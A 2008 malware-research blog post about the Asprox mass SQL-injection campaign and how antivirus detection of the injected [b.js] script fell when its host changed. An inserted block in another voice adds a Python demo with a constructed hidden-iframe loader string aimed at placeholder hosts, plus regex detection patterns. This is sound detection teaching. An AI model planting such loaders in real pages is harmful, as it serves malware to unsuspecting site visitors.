Malicious Code Research (MCRC) Blog - 2009

Jul 03, 2008

Short research of “in-the-cloud-service” and “unknown malware samples”

It looks like the new AV buzzword “in-the-cloud service” has gathered momentum among anti-virus vendors.
On June 30, 2008 an interview with Trend Micro’s CEO was published on ZDNet.co.uk titled “Antivirus industry lied for 20 years”. It makes me wonder what is going to change in the 21st year. In the interview Trend Micro’s CEO unveiled the new vision of her company: moving to an “In the Cloud Service”, i.e. one that “throws all the unknown samples up into the cloud for deeper and faster pattern recognition”. What will happen if I’m offline...?

Although I was very impressed with this new vision, it did sound a little vague to me, so I tried to clarify for myself what “unknown samples” means. As far as I know, anti-virus blocks what it has seen before and holds a signature for. What is the advantage of the cloud for detecting malicious code that is unknown? I can understand that a cloud can indicate volume, but I am not sure about unknown malicious code.

I would like to share with you the results of my short research of “unknown samples” and “in-the–cloud service”.
During June 2008, a new round of mass SQL injection attacks started. The attack tool (aliased “Asprox”) has been around for a couple of years, but during the last year there has been a new rise in the number of attacks. A new “in the wild” round of this mass attack is not supposed to be considered “unknown” to security vendors, but let’s try to keep our optimistic spirit and not digress.
The attack is designed to search Google for .asp pages which contain various terms, and then launch SQL injection attacks against the websites returned by the search. A script/iframe is injected into the compromised website:

The injected script consisted of the following code:

I sent the [b.js] script for a VirusTotal scan and got 10/33 AV products detecting the file as potential malware. Which is obviously a typical false-positive case, isn’t it?

When I modified the script to point to another location of the malicious file [newhost.com.newfil.cgi], VirusTotal reported only 6/33 AV products detecting the file as potential malware. Where did the other 4 disappear to?

During June 2008, we detected more than 70 different domains hosting [b.js] and the location of the malicious file was unique to each and every one of them.
Following are the top malicious hosts with successful exploitation during the period of May 31 – June 30:

Can it be that anti-virus products now hold signatures for domains and URLs rather than trying to identify malicious code they have never inspected before? As my research found, just by changing the domain name some AVs no longer flagged this code as malicious... surprisingly enough.
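To make that observation concrete, here is an added example (my own construction, not code from the post or from the campaign it describes) that runs four detector styles over a constructed loader script modelled on the hidden-iframe injection mentioned above, then re-points the script at a second placeholder host exactly as the experiment in the post did. The hostnames and the script body are assumptions; only the URL-agnostic detectors survive the host swap.

```python
import hashlib
import re

# Constructed sample of an injected loader, modelled on the hidden-iframe
# injection the post describes. Hostnames are placeholders, not the 2008 hosts.
SAMPLE_A = ("document.write('<iframe src=\"http://host-a.invalid/newfil.cgi\" "
            "width=0 height=0></iframe>');")
# The post's experiment: the same code, pointed at a different host.
SAMPLE_B = SAMPLE_A.replace("host-a.invalid", "host-b.invalid")

URL_RE = re.compile(r"https?://([^/\"'\s]+)[^\"'\s]*", re.IGNORECASE)

def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()

def normalise(script: str) -> str:
    """Replace every URL with a fixed token so only the code's shape is hashed."""
    return URL_RE.sub("URL", script)

# Three 'signatures' learnt from SAMPLE_A only.
KNOWN_HASHES = {sha256(SAMPLE_A)}             # exact-file signature
KNOWN_HOSTS = {"host-a.invalid"}              # domain/URL blocklist
KNOWN_SHAPES = {sha256(normalise(SAMPLE_A))}  # URL-agnostic structural signature

# Generic heuristic: document.write of an iframe with an external src,
# sized to zero so the visitor never sees it.
LOADER_RE = re.compile(r"document\.write\s*\(.*<iframe[^>]*\bsrc\s*=\s*[\"']?https?://",
                       re.IGNORECASE | re.DOTALL)
HIDDEN_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0\b", re.IGNORECASE)

def scan(script: str) -> dict:
    """Run all four detectors and report which ones flag the script."""
    hosts = {m.group(1).lower() for m in URL_RE.finditer(script)}
    return {
        "file_hash": sha256(script) in KNOWN_HASHES,
        "host_blocklist": bool(hosts & KNOWN_HOSTS),
        "structure_hash": sha256(normalise(script)) in KNOWN_SHAPES,
        "hidden_iframe_heuristic": bool(LOADER_RE.search(script) and HIDDEN_RE.search(script)),
    }

if __name__ == "__main__":
    for name, sample in (("original host", SAMPLE_A), ("re-hosted", SAMPLE_B)):
        print(name, scan(sample))
```

A vendor whose only signature for [b.js] is the file hash or the hosting domain behaves like the 4 products that vanished after the edit; the structural and heuristic detectors still fire because the code itself did not change.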

As the [b.js] file points to a malicious file, which is the one I would expect security vendors to mark as dangerous, I submitted the actual malicious file to VirusTotal. This time half of the vendors detected it as potential malware, so it came out OK and we kept our optimistic spirit after all...

This malicious file has been around for over a month now. Isn’t that enough time for security vendors to become familiar with a mass attack and write a signature for this file? Will an “in-the-cloud” service help improve that? I’m not really sure. It needs a different security technology to come to the rescue.

Posted by Ayelet Heyman
